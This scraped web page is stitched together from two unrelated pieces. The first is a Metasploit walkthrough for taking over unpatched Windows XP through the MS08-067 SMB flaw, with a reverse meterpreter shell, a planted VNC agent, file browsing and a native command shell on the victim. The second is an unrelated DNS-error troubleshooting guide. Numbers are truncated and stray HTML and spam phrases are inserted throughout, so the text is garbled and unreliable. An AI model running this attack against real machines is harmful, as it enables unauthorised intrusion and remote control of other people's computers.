Hack windows xp with metasploit.Hack windows xp with MS0.Using metasploit its possible to hack windows xp machines just by using the ip address of the victim machine.It does not involve installing any backdoor or trojan server on the victim machine.Metasploit does this by exploiting a vulnerability in windows samba service called ms.This exploit works on windows xp upto version xp sp.The vulnerabilityexploit module inside metasploit is Name Microsoft Server Service Relative Path Stack Corruption.Module exploitwindowssmbms.Further details and references to the vulnerability can be found at the following pageshttp cvedetails.MS0.Note This exploit is old as of now and will work only if the windows xp on the target machine is unpatched and not running any firewalls.If you were to scan a range of ip addresses to discover online windows xp machines, then most of them would likely be patched through automatic updates.So if you want to test and practise this exploit, setup a vulnerable unpatched xp system.Scan for open ports.Before exploiting the xp machine with metasploit it is a good idea to scan for open ports using nmap to confirm that ports are accessible and accepting connections.Microsoft Loopback Adapter Windows 7 Change Mac Address' title='Microsoft Loopback Adapter Windows 7 Change Mac Address' />Here is a quick exampleemail protected nmap n s.V 1.Starting Nmap 6. 2.PDT.Nmap scan report for 1.Host is up 0.Not shown 9.PORT STATE SERVICE VERSION.Microsoft Windows RPC.Microsoft Windows XP microsoft ds.Microsoft HTTPAPI httpd 1.SSDPUPn.P. MAC Address 0.D3 2.C 3. 7 Cadmus Computer Systems.Service Info OS Windows CPE cpe o microsoft windows.Service detection performed.Please report any incorrect results at http nmap.The computer runs Windows XP Home Edition.The computer runs Windows XP Professional and Simple File Sharing is enabled.You can check this by opening.Nmap done 1 IP address 1 host up scanned in 7.Check the port number 4.It is running the microsoft ds samba service.This service is used to share printers and files across the network.It is this service that is vulnerable to the above mentioned exploit and would be hacked next using metasploit.Exploit using metasploit.The exploit is quite easy to launch.Start msfconsole.Using notepad to track pentests Have Metasploit Pro report on hosts.Select the exploit with use command.If you want to read information about the exploit then type info and hit enter.See the options availablemsf exploitms.Module options exploitwindowssmbms.Microsoft Loopback Adapter Windows 7 Change Mac Address' title='Microsoft Loopback Adapter Windows 7 Change Mac Address' />Name Current Setting Required Description.RHOST yes The target address.Microsoft Loopback Adapter Windows 7 Change Mac Address' title='Microsoft Loopback Adapter Windows 7 Change Mac Address' />RPORT 4.Set the SMB service port.SMBPIPE BROWSER yes The pipe name to use BROWSER, SRVSVC.Exploit target.Automatic Targeting.The important option to set is the RHOST Remote Host.This is the ip address of the victim machine that is running the vulnerable windows xp.In this example the ip address is 1.So set the optionmsf exploitms.RHOST 1.RHOST 1. 92. Select the payload.Next comes the payload.Payload is that piece of code that runs along with the exploit and provides the hacker with a reverse shell.We are going to use the windows meterpreter payload.If you want to see all the available payloads then use the show payloads command.Why meterpreter Because meterpreter is a very powerful kind of reverse shell that has lots of functionality already built in.The functionality includes common post exploitation tasks like scanning the targets network, hardware, accessing devices etc.Meterpreter can also start a vnc session.Check options once again.Now that we have selected out payload, its time to check the options once again.Module options exploitwindowssmbms.Name Current Setting Required Description.RHOST 1.The target address.RPORT 4.Set the SMB service port.SMBPIPE BROWSER yes The pipe name to use BROWSER, SRVSVC.Payload options windowsmeterpreterreversetcp.Name Current Setting Required Description.EXITFUNC thread yes Exit technique seh, thread, process, none.LHOST yes The listen address.LPORT 4. Sql Update Table Default Value In Excel . The listen port.Exploit target.Automatic Targeting.Now the options also include the payload options.The important options to set are LHOST and LPORT.The LHOST is the ip address of local machine or hacker machine.The LPORT is the port number on which the reverse shell listener will receive the incoming shell.So setup the correct valuesmsf exploitms.LHOST 1.LHOST 1. 92. LPORT 6.LPORT 6.Launch the exploit.Now metasploit is all configured to launch the exploit.Enter exploit and hit enter.Started reverse handler on 1.Automatically detecting the target.Fingerprint Windows XP Service Pack 3 lang English.Selected Target Windows XP SP3 English Always.On NX.Attempting to trigger the vulnerability.Sending stage 7.Meterpreter session 2 opened 1.If it runs correctly you finally get the meterpreter shell.Type in help and hit enter to see what commands are available.Lets try running some of the common commands.Post Exploitation with meterpreter.Get system information.The sysinfo command will get the system information of victim machine.Computer.OS Windows XP Build 2.Service Pack 3.Architecture x.System Language enUS.Meterpreter x.Shows some basic information about the windows installation.Get network information.The ipconfig command will show the network interfaces and their network configuration.Name MS TCP Loopback interface.Hardware MAC 0.MTU 1.IPv. 4 Address 1.IPv.Netmask 2.Name AMD PCNET Family PCI Ethernet Adapter Packet Scheduler Miniport.Hardware MAC 0.MTU 1.IPv. 4 Address 1.IPv.Netmask 2.Start vnc server.If you want a vnc session on the victim machine then run the vnc script.Creating a VNC reverse tcp stager LHOST1.LPORT4.Running payload handler.VNC stager executable 7.Uploaded the VNC agent to C WINDOWSTEMPr.Rlm.Dx. exe must be deleted manually.Executing the VNC agent with endpoint 1.It takes a few seconds, and then a window will popup with remote desktop on the vicitim machine.Now you can use your mouse to interact with the victim desktop as if it were your own.Browsing the file system.For browsing the file system there are lots of linux style commands.Command Description.Read the contents of a file to the screen.Change directory.Download a file or directory.Edit a file.Print local working directory.Print working directory.Change local working directory.Print local working directory.List files.Make directory.Print working directory.Delete the specified file.Remove directory.Search for files.Upload a file or directory.Get native shell.If you finally want the command prompt style shell on the victim machine enter shell and hit enter.Process 1.Channel 3 created.Microsoft Windows XP Version 5.C Copyright 1.Microsoft Corp. C WINDOWSsystem.Now its the windows command prompt.Play around it and when done, type exit and press enter.It will come back to the meterpreter session.Next.The meterpreter commands shown above were just the basic commands of meterpreter.Asterisk Hardware Vs Software Echo Cancellation On Iphone more.Meterpreter has lots of inbuilt scripts that can do lots of other things on the victim machine.We shall check them out in some other post.So keep hacking till then.Last Updated On 8th May 2.Fix DNS Server Not Responding Error A Step by step guide.This is a complete guide on fixing DNS Server isnt Responding error.I was just about to post an article on a different topic, but then I noticed that for some reasons, some websites were not opening up.There were no error messages and the web page comes with an option to click on diagnostic tools to find the cause.I confirmed that my internet connection is working fine as I was able to go to google and look for search results.The next step was to open these website with browsers such as IE, Firefox and Chrome.The logic is to check if it as a browser related problem.All my web browsers had the same issue which confirmed, this is not a browser problem.Then I tried the diagnostic tool link that popped up in the webpage, which showed me DNS Server Not Responding Error.After performing some troubleshooting, I was able to fix the issue.Thought I would share it in this article.Reasons for getting DNS Server Not Responding Error.The server which host the website might be temporarily down due to technical reasons.The DNS service in your computer is corrupted or not working.The security firewall or security software itself might have accidentally blocked your PC from communicating with a website or certain websites.How to narrow down the source of DNS server not Responding Error If you have another computer or mobile device accessing internet from the same network, then check if they are able to access internet.The other mobile device can be a smart phone or tablet.If the other devices have internet connection, then this is an issue with your computer.If the other devices are not able to access internet, dont waste any time and contact your ISP.Explain them the scenario and they will help.Some ISP technicians are quick to blame your computer for this issueTry to access internet using safe mode with networking.It is explained below under the section How to fix DNS Server Not Responding Error because of a corrupted security.If your computer is able to access internet in safe mode with networking, a security software or conflicting third party software might be responsible for the problem.If you are getting DNS server error only on couple of websites, then it might be a temporary issue with the server which is hosting that website.You can check it using websites like http downorisitjustme.Just enter the name of the website that you would like to check.This website will ping to your destination website and let you know if it is up or down.In case if it shows that the website you want is up and running properly, but you are not able to see it, then the problem is with your computer.If the website is shown as down or not working, you need to wait until the webmaster of the website get the issue fixed.Check if the error is a browser problem by browsing websites using different browsers such as IE, Firefox, Chrome, Safari or Opera.This happens rarely, but yet possible.If the error is happening only on a particular browser, then you need to troubleshoot the browser.Following the steps mentioned in IE optimization which fix most issues, no matter which browser you use.Here is how to do a complete Internet explorer optimization.How to fix a DNS Server Not Responding Error Normally.If you havent done any troubleshooting yet, try the steps in this order.Reset IP and Winsock.The problem might be as a result of corrupted IP and Winsock.Follow the commands in the order to reset the settings.Open command prompt with Admin privilege.For Win 1.Start button click Command Prompt AdminFor Win 7 and Win 8, click Start type cmd inside search window right click on the result which show command prompt click Run as administratorUse the commands in following orderipconfig flushdnsipconfig registerdnsnetsh int ip reset c resetlog.Restart computer and check if the problem is fixed.Note Flushdns command is used to flush the DNS database cache, while IP and Winsock command reset these settings.Restart computer and check if the problem is fixed.If not, follow the next step.Do a Power cycle.Sometimes the problem might be as simple as shutting down and turning on modem router.Small changes in computer settings or a change in configuration with router or modem settings may result in DNS error.Once the device is restarted most of these changed settings will be cleared.So follow the step.Shut down your computer and also modemrouter for a minute or two.Note It is recommended to turn devices for a minute or two to allow these devices to drain the electrical charge completely which result in a complete reset.Restart both computer and router to check if the DNS problem is fixed.If not, follow the next step.Use Global DNSReplace the DNS server address from ISP with a Global DNS.Global DNS is provided by different private and non profit organizations.Each server address comes with its own special features which is listed below.Check if the problem is fixed.Changing the Preferred and Alternate error usually fix most of the cases.Here is a list of DNS addresses which can be used on your computer.You will find the Preferred and Alternate DNS addresses with the provider listed in bold.Google DNS gives faster performance.Neustars DNS is safe and fast.Comodos DNS for extra security.Norton Connect Safe detects pornographic and harmful websites.Ideal for setting on minors computer.Free DNS Access to all domains irrespective of regional and censorship issues.DNS Watch is ideal for high performance.Check this article if you notice Windows 1.DNS problems frequently after installing Windows 1.Anniversary Update.How to fix a DNS Server Not Responding Error because of a corrupted security.Security software is another major culprit responsible for DNS Server Not Responding error.Every security software tends to get corrupted over a period of time for reasons ranging from file corruption while updating files, conflicts with other software or indirect changes to security settings as a result of intentional or unintentional changes made on your PC.This might cause the security software to block internet connection.Configure Security Software properly.It is possible that your security software may have got corrupted or not working properly for variety of reasons.Check if your security software is configured properly especially the Firewall settings.A good method to check this is disable all security software and firewall.Then check if the problem is fixed.If not fixed, try one more time by resetting all security software and firewall settings to default.Check the status.Check the internet status in Safe Mode with Networking.Safe mode is a troubleshooting mode that allows only the essential operating system files and drivers to load.All third party softwares and drivers are prevented from loading.When you select Safe Mode with Networking, apart from the basic OS files and drivers, network driver is also loaded so that you can go online.Once you reach the desktop, try to go online.If the internet works fine, a third party program installed in your device is responsible for the problem.The logic behind using Safe Mode with Networking If the internet connection works fine in Safe Mode with Networking, then it should be the third party services or driver which is responsible for the problem because these are the services which are blocked in Safe Mode with Networking.The major culprits to look for in third party services.Disable or remove security software.Uninstall any recently installed device driver.Uninstall any recently installed software.DNS server not responding showing only for some websites.Sometimes the error message happens to only some websites.Of course, you can check if the website in question is working using www.But what if this is happening on authority websites like Google, Microsoft or Yahoo.You cannot expect these websites to be down and it happens very rarely.The solution mentioned below is simple and it worked very well for me.I apologize for not having any logical explanation to why this error happens only to some websites.You are always welcome to share your opinion on this.Open ncpa.